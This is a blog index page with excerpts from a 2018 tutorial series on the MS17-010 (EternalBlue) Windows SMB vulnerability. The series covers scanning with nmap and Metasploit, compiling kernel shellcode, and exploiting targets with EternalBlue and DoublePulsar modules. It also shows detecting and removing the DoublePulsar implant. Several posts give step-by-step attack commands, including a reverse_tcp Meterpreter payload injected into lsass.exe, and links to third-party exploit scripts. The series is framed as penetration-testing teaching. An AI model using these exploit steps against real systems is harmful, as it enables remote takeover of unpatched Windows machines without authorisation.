Posts

Showing posts from January, 2018

MS17-010 Vulnerability - EternalBlue exploit using a binary payload and python script on Windows 7 and Windows 2008 R2 targets

Image
In this video we exploit the MS17-010 Vulnerability (EternalBlue) on Windows 7 and Windows 2008 R2 targets. We use the shellcode (binary payloads) that we previously generated, in addition to a python script and Metasploit Framework. Please check my previous post on generating the shellcode: Generating shellcode - using msfvenom to generate a binary payload We also need Worawit's eternalblue7_exploit.py python script, which can be downloaded from the following Github URL: https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a Before starting the actual target exploitation, we need to configure the multi handler exploit in Metasploit Framework. The multi handler exploit is running in listening mode and is necessary in order to establish the Meterpreter session between the attacker machine (Kali Linux OS) and the target machine (Windows OS). It is essential to configure the multi handler with the same Metasploit payload, LHOST and LPORT values that were previously u

Generating shellcode - using msfvenom to generate a binary payload

Image
In this video we generate a binary payload (shellcode) that we will use later on to exploit the EternalBlue Windows OS vulnerability. The article below is an excellent introduction to how a binary payload works: https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/ Our payload has 2 parts that will be generated independently, then combined into a single file. The first component is the Windows x64 kernel shellcode for Eternalblue exploit and the ASM code is downloaded from the following location: https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501 We will use "nasm" (general-purpose x86 assembler) on Kali Linux, in order to compile the kernel shellcode, by using the command below: nasm -f bin eternalblue_x64_kshellcode.asm -o sc_x64_kernel.bin The output for this command (and the first component for our payload) is the "sc_x64_kernel.bin" file. The second component for our payload, is the part of the code which will create t

MS17-010 Vulnerability - Detecting and uninstalling DoublePulsar implant

Image
In this video we will identify computers affected by the MS17-010 vulnerability, which were compromised with the DoublePulsar implant.  The detection task will be performed by using Countercept's DoublePulsar detection script, which can be downloaded from the following GitHub location: https://github.com/countercept/doublepulsar-detection-script The same script can also be used for uninstalling the DoublePulsar implant. Check also my other posts on how to install the DoublePulsar module and on how to use the DoublePulsar exploit module . Commands used in this video: git clone https://github.com/countercept/doublepulsar-detection-script.git This command creates a local copy of the "doublepulsar-detection-script" Git repository. python detect_doublepulsar_smb.py --ip <IP_Address> This command will check if the target at <IP_Address> is compromised with the DoublePulsar implant. python detect_doublepulsar_smb.py --ip <IP_Address> --uninstall --

MS17-010 Vulnerability - Using DoublePulsar exploit module in Metasploit

Image
In this video we will use ElevenPaths' DoublePulsar module in order to exploit the MS17-010 vulnerability. You could check my other posts on how to identify the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module . Check also my post on how to install Wine32 and ElevenPaths' DoublePulsar module . Metasploit commands used in this video: search doublepulsar This command identifies modules containing the "doublepulsar" string. use exploit/windows/smb/eternalblue_doublepulsar This command selects the "exploit/windows/eternalblue_doublepulsar" module. show options This command displays the options available for the selected module. set processinject lsass.exe This commands selects the process to inject the payload into. set rhost <IP_Address> This command sets the target IP address. set targetarchitecture x64 This command sets the x64 architecture for the target (by default it is x86). show

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Image
Previously we identified the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module . In the video below we will exploit the MS17-010 vulnerability by using the EternalBlue Metasploit module which comes by default with Metasploit Framework. Metasploit commands used in this video: search ms17_010 This command identifies modules containing the "ms17_010" string. use exploit/windows/smb/ms17_010_eternalblue This command selects the "exploit/windows/smb/ms17_010_eternalblue" module. show options This command displays the options available for the selected module. set processname lsass.exe This commands selects the process to inject the payload into. set rhost <IP_Address> This command sets the target IP address. show payloads This command (when is executed under the module context), shows the payloads compatible with the selected module. set payload windows/x64/meterpreter/reverse_tcp This command select

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux

Image
In the video below we will identify computers affected by the MS17-010 vulnerability, by  using a Metasploit auxiliary scanning module. Check also my other post on detecting the MS17-010 vulnerability by using NMAP. MS17-010 is a severe SMB Server vulnerability which affected all Windows operating systems and was exploited by WannaCry, Petya and Bad Rabbit Ransomware. This vulnerability was made public in March 2017 and allowed remote code execution on the victim computer.  For more information, check the Microsoft Security Bulletin MS17-010: https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010 https://support.microsoft.com/en-au/help/4013389/title Metasploit commands used in this video: search name:ms17_010  This command lists the Metasploit modules containing the string "ms17_010" in the name.  Can also simply use: search ms17_010 use auxiliary/scanner/smb/smb_ms17_010 This command selects the module "auxiliary/scanner/smb/sm

MS17-010 Vulnerability - Scanning using NMAP on KALI Linux

Image
MS17-010 is a severe SMB Server vulnerability affecting all Windows operating systems, which was made public in March 2017. It allows remote code execution on the victim computer and was exploited by WannaCry, Petya and Bad Rabbit Ransomware (and many other...) For more information, check the Microsoft Security Bulletin MS17-010: https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010 https://support.microsoft.com/en-au/help/4013389/title Nmap ("Network Mapper") is a free and open source license utility for network discovery and security auditing, which is installed by default on Kali Linux. Check the NMAP website for more information: https://nmap.org/ https://nmap.org/book/man.html NMAP Scripting Engine (or NSE) allows users to write scripts for NMAP and share them. NSE scripts can be used for network discovery, vulnerability detection, vulnerability exploitation, OS version detection, Backdoor detection and so on ... For more informat

Installing Wine32 and DoublePulsar on Kali Linux

Image
The wine32 Kali Linux package and the DoublePulsar Metasploit module are needed for some of the next testing scenarios.  We will install the software as presented in the video below. Commands used during this video: dpkg -l *wine* This command lists the package names containing the string "wine" dpkg --add-architecture i386 && apt-get update && apt-get install wine32 This command performs the following: - adds i386 architecture (this is necessary because we install a 32-bit software on a 64-bit OS and makes sure that the software dependencies are correctly resolved) - updates the package lists from repositories - installs the wine32 package pwd This command writes the full path-name of the current working directory to the standard output git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git This command creates a local copy of the "Eternalblue-Doublepulsar-Metasploit" Git repository search double (Metasploit

Installing Kali Linux as a VMware Virtual Machine

Image
Kali Linux is arguably the most popular Linux distribution designed for Penetration Testing, Security Auditing and Digital Forensics. It is free and it does include more than 600 penetration testing tools.  In the video below we will create a VMware Virtual Machine running the latest version of Kali Linux. After installation we will apply the latest updates. Official Kali Linux Downloads URL: https://www.kali.org/downloads/ Offensive Security Download Page URL: https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/ Default Kali Linux credentials: User: root Password: toor Commands used to update the  Kali Linux installation: apt-get update This command downloads the package lists from the repositories and retrieve information on the newest versions of packages and their dependencies. apt-get dist-upgrade This command installs the newest versions of all packages currently installed on the system, from the sources updated as per